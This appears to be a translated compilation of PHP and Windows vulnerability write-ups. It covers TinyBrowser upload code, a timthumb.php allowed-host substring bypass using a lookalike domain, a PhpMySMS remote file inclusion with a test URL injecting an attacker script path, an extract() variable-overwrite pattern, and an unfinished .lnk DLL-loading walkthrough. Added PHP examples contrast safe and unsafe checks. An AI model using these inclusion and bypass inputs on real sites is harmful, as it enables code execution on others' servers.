Below is the editor's collection of TinyBrowser remote file upload vulnerability analyses (6 pieces in total), for reference only; we hope it helps. We also hope you will, like this article's contributor "gs429205", submit good articles to this site.
Published: -05.27
Author: Amxking
Affected versions: unknown
Vendor URL: www.lunarvis.com/products/tinymcefilebrowserwithupload.php
Vulnerability: remote file upload vulnerability
Let us look at the upload.php source code:
```php
<?php
require_once('config_tinybrowser.php');
// Set language
if(isset($tinybrowser['language']) && file_exists('langs/'.$tinybrowser['language'].'.php'))
{
	require_once('langs/'.$tinybrowser['language'].'.php');
}
else
{
	require_once('langs/en.php'); // Falls back to English
}
require_once('fns_tinybrowser.php');

// Check session, if it exists
if(session_id() != '')
{
	if(!isset($_SESSION[$tinybrowser['sessioncheck']]))
	{
		echo TB_DENIED;
		exit;
	}
}

if(!$tinybrowser['allowupload'])
{
	echo TB_UPDENIED;
	exit;
}

// Assign get variables
$validtypes = array('image','media','file');
$typenow = ((isset($_GET['type']) && in_array($_GET['type'],$validtypes)) ? $_GET['type'] : 'image');
$foldernow = str_replace(array('../','..\\','./','.\\'),'',($tinybrowser['allowfolders'] && isset($_REQUEST['folder']) ? urldecode($_REQUEST['folder']) : ''));
$passfolder = '&folder='.urlencode($foldernow);
$passfeid = (isset($_GET['feid']) && $_GET['feid']!='' ? '&feid='.$_GET['feid'] : '');
$passupfeid = (isset($_GET['feid']) && $_GET['feid']!='' ? $_GET['feid'] : '');

// Assign upload path
$uploadpath = urlencode($tinybrowser['path'][$typenow].$foldernow);

// Assign directory structure to array
$uploaddirs=array();
dirtree($uploaddirs,$tinybrowser['filetype'][$typenow],$tinybrowser['docroot'],$tinybrowser['path'][$typenow]);

// determine file dialog file types
switch ($_GET['type'])
{
	case 'image':
		$filestr = TB_TYPEIMG;
		break;
	case 'media':
		$filestr = TB_TYPEMEDIA;
		break;
	case 'file':
		$filestr = TB_TYPEFILE;
		break;
}
$fileexts = str_replace(",",";",$tinybrowser['filetype'][$_GET['type']]);
$filelist = $filestr.' ('.$tinybrowser['filetype'][$_GET['type']].')';

// Initialise alert array
$notify = array(
	'type' =>array(),
	'message' =>array()
);
$goodqty = (isset($_GET['goodfiles']) ? $_GET['goodfiles'] : 0);
$badqty = (isset($_GET['badfiles']) ? $_GET['badfiles'] : 0);
$dupqty = (isset($_GET['dupfiles']) ? $_GET['dupfiles'] : 0);

if($goodqty>0)
{
	$notify['type'][]='success';
	$notify['message'][]=sprintf(TB_MSGUPGOOD, $goodqty);
}
if($badqty>0)
{
	$notify['type'][]='failure';
	$notify['message'][]=sprintf(TB_MSGUPBAD, $badqty);
}
if($dupqty>0)
{
	$notify['type'][]='failure';
	$notify['message'][]=sprintf(TB_MSGUPDUP, $dupqty);
}
if(isset($_GET['permerror']))
{
	$notify['type'][]='failure';
	$notify['message'][]=sprintf(TB_MSGUPFAIL, $tinybrowser['docroot'].$tinybrowser['path'][$typenow]);
}
?>
TinyBrowser ::
<?php
if($passfeid == '' && $tinybrowser['integration']=='tinymce')
{
?>
<?php
}
else
{
?>
<?php
}
?>

<script type="text/javascript">
```
From 情blog
Program description:
TinyBrowser features: upload, delete and edit permissions can each be enabled or disabled in the configuration
Supports multiple uploads and shows upload progress
Simple image editing, such as rotation
Files can be browsed by image name or as a thumbnail list
Supports the FCKeditor editor
Vulnerability analysis:
Let us look at the upload.php source code. The PHP section is the same listing quoted above; this copy continues past the `<script>` tag into the initialisation of the Flash upload widget, where each addVariable() value is echoed by PHP (the echoed expressions did not survive in the quoted listing):
```php
<script type="text/javascript">
var so = new SWFObject("flexupload.swf", "mymovie", "100%", "340", "9", "#ffffff");
so.addVariable("folder", "
so.addVariable("uptype", "
so.addVariable("destid", "
so.addVariable("maxsize", "
so.addVariable("sessid", "
so.addVariable("obfus", "
so.addVariable("filenames", "
so.addVariable("extensions", "
so.addVariable("filenamelbl", "
so.addVariable("sizelbl", "
so.addVariable("typelbl", "
so.addVariable("progresslbl", "
so.addVariable("browselbl", "
so.addVariable("removelbl", "
so.addVariable("uploadlbl", "
```
Source: xuser.org/read.php?18
Author: xuser@fsafe
Today I saw on Weibo that WordPress had a vulnerability, so I immediately opened the relevant page to analyse the cause and found that it comes from insufficient validation in timthumb.php when it stores a remote file. The analysis went roughly as follows:
The file takes the submitted src variable, validates it and stores the file on the server:
```php
$src = get_request ('src', '');
```
It splits src into its components with parse_url ($src) and then validates it:
```php
global $allowedSites;
// work out file details
$filename = 'external_' . md5 ($src);
$local_filepath = DIRECTORY_CACHE . '/' . $filename;
// only do this stuff the file doesn't already exist
if (!file_exists ($local_filepath)) {
	if (strpos (strtolower ($src), '') !== false || strpos (strtolower ($src), '') !== false) {
		if (!validate_url ($src)) {
			display_error ('invalid url');
		}
		$url_info = parse_url ($src);
		if (count (explode ('.', $url_info['path'])) >2) {
			display_error ('source filename invalid');
		}
		if (($url_info['host'] == 'www. .com' || $url_info['host'] == ' .com') && preg_match ('/v=([^&]+)/i', $url_info['query'], $matches)) {
			$v = $matches[1];
			$src = 'img. .com/vi/' . $v . '/0.jpg';
			$url_info['host'] = 'img. .com'; // if the source is that site, rewrite the host stored earlier
		}
		$isAllowedSite = false;
		// check allowed sites (if required)
		if (ALLOW_EXTERNAL) { // ALLOW_EXTERNAL defaults to false
			$isAllowedSite = true;
		} else {
			foreach ($allowedSites as $site) {
				if (strpos (strtolower ($url_info['host']), $site) !== false) // look for $site anywhere in $url_info['host']
					$isAllowedSite = true; // once true, storage proceeds
			}
		}
	}
```
The $allowedSites array is defined at the top of the file as follows:
```php
$allowedSites = array (
	'flickr.com',
	'pic.ruiwen.com',
	'img. .com',
);
```
After this series of checks, if $isAllowedSite is true, the file is stored on the server:
```php
if ($isAllowedSite) {
	if (function_exists ('curl_init')) {
		global $fh;
		$fh = fopen ($local_filepath, 'w');
		$ch = curl_init ($src);
		curl_setopt ($ch, CURLOPT_TIMEOUT, CURL_TIMEOUT);
		curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/1107 Firefox/1.0');
		curl_setopt ($ch, CURLOPT_URL, $src);
		curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
		curl_setopt ($ch, CURLOPT_HEADER, 0);
		curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
		curl_setopt ($ch, CURLOPT_FILE, $fh);
		curl_setopt ($ch, CURLOPT_WRITEFUNCTION, 'curl_write');
		// error so die
		if (curl_exec ($ch) === FALSE) {
			unlink ($local_filepath);
			touch ($local_filepath);
			display_error ('error reading file ' . $src . ' from remote host: ' . curl_error ($ch));
		}
		curl_close ($ch);
		fclose ($fh);
		// check it's actually an image
		$file_infos = getimagesize ($local_filepath);
		// no mime type or invalid mime type
		if (empty ($file_infos['mime']) || !preg_match ("/jpg|jpeg|gif|png/i", $file_infos['mime'])) {
			unlink ($local_filepath);
			touch ($local_filepath);
			display_error ('remote file not a valid image');
		}
	} else {
		if (!$img = file_get_contents ($src)) {
			display_error ('remote file for ' . $src . ' can not be accessed. It is likely that the file permissions are restricted');
		}
		if (file_put_contents ($local_filepath, $img) == FALSE) {
			display_error ('error writing temporary file');
		}
	}
	if (!file_exists ($local_filepath)) {
		display_error ('local file for ' . $src . ' can not be created');
	}
	$src = $local_filepath;
} else {
	display_error ('remote host "' . $url_info['host'] . '" not allowed');
}
```
strpos is used to test for a match against the list, presumably to allow subdomains, but it also opens a security hole: a host such as pic.ruiwen.com.yourdomain.com satisfies the match as well.
The storage location of the file is determined by the following code:
```php
$filename = 'external_' . md5 ($src);
$local_filepath = DIRECTORY_CACHE . '/' . $filename;
```
Changing the matching rule, or simply removing every element of the $allowedSites array, works as a temporary fix for the problem.
Note: some timthumb.php versions differ in the contents of the $allowedSites array and in how the file is stored, but the root cause of the vulnerability is largely the same.
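The substring match discussed above, beside a dot-bounded suffix match, as an added example that is not timthumb's own code; the host names it is run over are constructed:

```php
<?php
// Added example (not timthumb code): the article's strpos() host check next to
// a stricter check, run over constructed host names.

$allowedSites = ['flickr.com', 'pic.ruiwen.com'];

// The article's check: the allowed name may appear anywhere in the host.
function isAllowedHostSubstring(string $host, array $allowedSites): bool
{
    foreach ($allowedSites as $site) {
        if (strpos(strtolower($host), $site) !== false) {
            return true;
        }
    }
    return false;
}

// Stricter: the host must be the allowed site itself or end in ".<site>",
// so extra labels after the allowed name never match.
function isAllowedHostStrict(string $host, array $allowedSites): bool
{
    $host = strtolower(rtrim($host, '.'));
    foreach ($allowedSites as $site) {
        $site = strtolower($site);
        if ($host === $site) {
            return true;
        }
        $suffix = '.' . $site;
        if (strlen($host) > strlen($suffix) && substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// Constructed cases: two genuine hosts, the article's lookalike, and a prefix lookalike.
$cases = [
    'pic.ruiwen.com'                => true,
    'farm1.flickr.com'              => true,
    'pic.ruiwen.com.yourdomain.com' => false,
    'notflickr.com'                 => false,
];
foreach ($cases as $host => $shouldAllow) {
    assert(isAllowedHostStrict($host, $allowedSites) === $shouldAllow, $host);
}
// The substring check accepts the lookalike, which is the flaw the article describes.
assert(isAllowedHostSubstring('pic.ruiwen.com.yourdomain.com', $allowedSites) === true);
```

The host passed in should be the one parse_url() returns for a URL whose scheme has already been checked, since the suffix test says nothing about the rest of the URL.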
Affected systems:
PhpMySms PhpMySms <= V2.0
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 18633
PHPMySMS is an open-source, PHP-based web SMS solution.
PHPMySMS's implementation contains an input validation vulnerability that a remote attacker could exploit to execute arbitrary commands on the server.
A remote attacker can use a remote file inclusion vulnerability in PHPMySMS's gateway.php to execute arbitrary PHP code. The vulnerable code is:
==============================================================
if (($_POST['mode'] == "1") or ($_GET['mode'] == "1")) {
	include ("config.php");
} else {
	include ("$ROOT_PATH/config.php");
}
==============================================================
<* Source: Persian-Defacer (www.Hacking-Boys.com) *>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching;
users act at their own risk!
[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
PhpMySms
--------
The vendor has not yet released a patch or upgrade; we recommend that users of this software monitor the vendor's homepage for the latest version:
Http://www.phpmysms.com
Pseudocode:
```php
<?php
$rootdir = str_replace("\\", '/', dirname(__FILE__));
// what follows is the code pulled in by require $rootdir.'/include/common.inc.php';
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);
require $rootdir.'/web/admin/include/common.inc.php';
?>
```
Having read this far, what do you make of it? If you trace this statically with grep or a similar tool, you will most likely miss it, because the result of that analysis would be:
```php
$rootdir = str_replace("\\", '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php';
require $rootdir.'/web/admin/include/common.inc.php';
```
Seeing that $rootdir is sanitised, would you conclude that this spot is safe?
So blindly hunting with grep and other static approaches will not find bugs like this one...
In hindsight, grey-box testing works well for this kind of bug: first read the code and notice the variable overwrite in the common.inc.php core, then black-box test which variables can actually be overwritten.....
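To make the two variable-overwrite patterns on this page comparable, here is an added example (not code from PhpMySMS or from the article) that runs both inside one function and checks what path the include would receive; $request is a constructed stand-in for $_GET/$_POST:

```php
<?php
// Added example: reproduces the extract() pattern from the pseudocode and the
// never-assigned $ROOT_PATH from the PhpMySMS snippet, then compares flags.
function includePaths(array $request, int $flags): array
{
    // Derived locally, exactly as in the pseudocode above.
    $rootdir = str_replace("\\", '/', dirname(__FILE__));
    // $ROOT_PATH is deliberately never assigned, as in gateway.php.

    // common.inc.php pours request data into the local scope.
    @extract($request, $flags);

    return [
        'admin'  => $rootdir . '/web/admin/include/common.inc.php',
        'config' => (isset($ROOT_PATH) ? $ROOT_PATH : '') . '/config.php',
    ];
}

function safeIncludePaths(): array
{
    // Hardened: no extract() at all; both roots are fixed by the script's location.
    $rootdir   = str_replace("\\", '/', dirname(__FILE__));
    $ROOT_PATH = $rootdir;
    return [
        'admin'  => $rootdir . '/web/admin/include/common.inc.php',
        'config' => $ROOT_PATH . '/config.php',
    ];
}

// Constructed request: parameters that share the names of the two variables.
$request = ['rootdir' => '/request/controlled', 'ROOT_PATH' => '/request/controlled'];
$local   = str_replace("\\", '/', dirname(__FILE__));

// EXTR_OVERWRITE (the page's case): both include paths now come from the request.
$over = includePaths($request, EXTR_OVERWRITE);
assert($over['admin']  === '/request/controlled/web/admin/include/common.inc.php');
assert($over['config'] === '/request/controlled/config.php');

// EXTR_SKIP keeps the already-defined $rootdir but still lets the request
// supply the never-defined $ROOT_PATH, so it is not a complete fix on its own.
$skip = includePaths($request, EXTR_SKIP);
assert($skip['admin']  === $local . '/web/admin/include/common.inc.php');
assert($skip['config'] === '/request/controlled/config.php');

// Not extracting request data at all leaves both paths local.
$safe = safeIncludePaths();
assert($safe['admin']  === $local . '/web/admin/include/common.inc.php');
assert($safe['config'] === $local . '/config.php');
```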
Preface
Windows shell32 has a vulnerability in how it handles shortcut files for Control Panel applets: it can be made to load an arbitrary DLL from disk, which means arbitrary code execution.
Generating the vulnerable file
Go to Control Panel, right-click "Display" and choose "Create shortcut", placing the shortcut on the desktop.
Then open the "Display.lnk" file on the desktop with WinHex.